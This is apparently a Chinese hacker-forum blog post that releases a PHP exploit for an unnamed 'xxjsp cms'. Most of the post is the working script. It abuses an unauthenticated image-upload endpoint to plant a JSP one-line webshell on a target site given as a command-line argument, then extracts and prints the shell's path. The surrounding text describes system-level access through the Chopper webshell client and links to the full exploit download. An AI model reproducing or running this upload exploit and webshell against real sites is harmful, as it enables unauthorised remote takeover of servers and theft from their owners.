今天起了个早 看到 法客的 有个贱人 (id还真的叫贱人 ) 发了个 0day 有点时间 就写了个 exp
先上 jb
附件里面的 1.txt 是 jsp 一句话
菜刀连接 chopper jsp就是好 直接是系统权限
这里需要在命令行下使用 curl 开启 curl 方法
1.打开php.ini,开启extension=php_curl.dll
2.检查php.ini的extension_dir值是哪个目录,检查有无php_curl.dll,没有的请下载php_curl.dll,再把php目录中的libeay32.dll,ssleay32.dll拷到c:\windows\system32里面
exp (注 : 仅供技术研究)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| <!--?php
set_time_limit(0);
echo "
=======================================================================================
┏━━━━━━━┓ F CK | 法客论坛 - F4ck Team
┏┫ |||┣┓ ┏┓ | 关于法客 - http://team.f4ck.net
┗┫━━ ┃ ━━┣┛ ┣┫ | 联系法客 - http://team.f4ck.net/call.html
┃ ━━━━━ ┃ ┏┳┫┣┳┓ | 核心成员 - http://team.f4ck.net/team.html
┗━━━┳━━━┛ ┃ ┃ | 荣誉会员 - http://team.f4ck.net/honor.html
┏━━▇▇▇━━━━━┻━━━━┛ | 邀 请 码 - http://team.f4ck.net/reg.html
┃ ▇▇▇ | ExpTitle - xxjsp cms GetShell
┃ ▇▇▇ | Author - Yaseng
┗ ┃U┃ | SbBlog - http://www.yaseng.me
┃ ┃ |
=======================================================================================
";
if ($argc < 2) { print_r(' +---------------------------------------------------------------------------+ Example: php '.$argv[0].' localhost +---------------------------------------------------------------------------+ '); exit; } $site = $argv[1]; $url=$site.'/system/resource/smalledit/upimage.jsp?actiontype=uploadprepic&dbName=vsb&ownerName=&owner='; $file = array("wbimageurlf"=> '@'.dirname(__FILE__)."\\1.txt","wbimageurl"=>"1.jsp");
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER,0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$file);
$contents = curl_exec($ch);
curl_close($ch);
if(preg_match_all("/window.returnValue = \'(.*)';/sU",$contents,$result)){
$shell = $result[1][0];
$shell=str_replace("\\","",$shell);
echo "[*]--Good Get Shell:".$site.$shell."\r\n";
}
else
{
echo "[-]--Bad No Shell:".$site."\r\n";
}
?>
|
文中 jsp一句话 及 完整exp 下载 猛点击我
附件里面的 1.txt 是 jsp 一句话